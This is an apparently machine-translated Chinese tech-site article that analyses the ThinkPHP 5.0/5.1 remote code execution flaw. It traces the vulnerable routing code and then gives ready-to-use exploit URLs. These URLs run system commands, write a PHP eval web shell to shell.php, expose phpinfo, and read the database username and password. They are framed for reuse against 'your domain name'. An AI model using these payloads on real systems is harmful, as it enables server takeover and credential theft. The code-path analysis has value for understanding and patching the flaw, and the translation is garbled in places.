Shulou(Shulou.com)06/01 Report--

On December 11, 2018, exploit-db updated a remote code execution vulnerability in the thinkphp framework

Exploit address: https://www.exploit-db.com/exploits/45978

Due to insufficient detection of the controller name by the framework, getshell is not enabled without mandatory routing

Scope of impact of vulnerability

Thinkphp 5.1.0-5.1.31

Thinkphp 5.0.5-5.0.23

Installation:

Download address http://www.thinkphp.cn/donate/download/id/1125.html

Download and decompress it in the / var/www/html/ directory.

Loophole analysis

/ number of thinkphp/library/think/App.php lines: 120

We can see that route detection is done through the self::routerCheck function

We can see that we enter the $request- > path () function again.

/ thinkphp/library/think/Request.php lines: 416 lines

Enter the pathinfo () function and continue to trace to line 384

Config::get ('var_pathinfo') is the parameter set in the configuration file. The default value is s. Get the key value from GET and assign it to $path in routeCheck.

Let's go back to the number of App.php lines: 606

Route detection will be performed here. After checking $check, you will enter the else branch to import the route configuration, and then check that the routing url scheduling result is $result. If the scheduling fails and the mandatory route $must is enabled, the route is reported to be invalid, and then enter the Route::parseUrl function to resolve the operation according to $path (custom url).

Start tracking the parseUrl function

/ number of thinkphp/library/think/Route.php lines: 1208

Number of lines entering parseUrlPath function: 1275

Here we can see that the url address of the module / controller / operation is split into an array to return (a little heavy without a good picture) the number of lines: 1217

We can see that the returned result is assigned to $path, the routing information is extracted and encapsulated into $route, and finally returned

Number of thinkphp/library/think/App.php rows: 120

Number of lines entering self::exec function: 445

We can see that the function of the module / controller / operation is self::module

Start tracking module function lines: 494

We can see that according to $config ['app_multi_module'] to enter the multi-module deployment, $bind is NULL, and then enter the elseif branch to determine whether the module is in the prohibited list $config [' deny_module_list'], and if mmodule exists, $available = true, no exception will be thrown.

The final return value of the module function finds that $controller is not filtered, so it should be think\ app, that is, return self::invokeMethod ($call, $vars).

Number of lines entering self::invokeMethod function: 329

The $call put in at this time is $method, which is an array. The first element is a think\ App object, and the second element is the string invokefunction that calls the method name, and then gets the corresponding method under this object by reflecting ReflectionMethod.

Then get the passed parameter, that is, payload, through the function $args = self::bindParams ($reflect, $vars)

Finally, call reflection $reflect- > invokeArgs ($args); and pass the Payload array into the reflection object function invokeFunction to complete the code execution.

At this point, the ThinkPHP remote code execution vulnerability analysis is complete.

-

Vulnerability exploitation

Http://xxx.xxx.xxx( here is your domain name) / public/index.php?s=index/think\ app/invokefunction&function=call_user_func_array&vars [0] = system&vars [1] [] = whoami

Remote code execution command: whoami (the whoami after the link can be changed to the command you want to execute, special symbols can be transcoded by url)

Http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Write out the information of phpinfo through phpinfo function

Http://xxx.xxx.xxx/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php

Write to shell

Http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

Also display phpinfo

Http://xxx.xxxx.xxx/thinkphp/public//?s=.|think\config/get&name=database.username

Database user name (the following username is changed to password as the database password)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.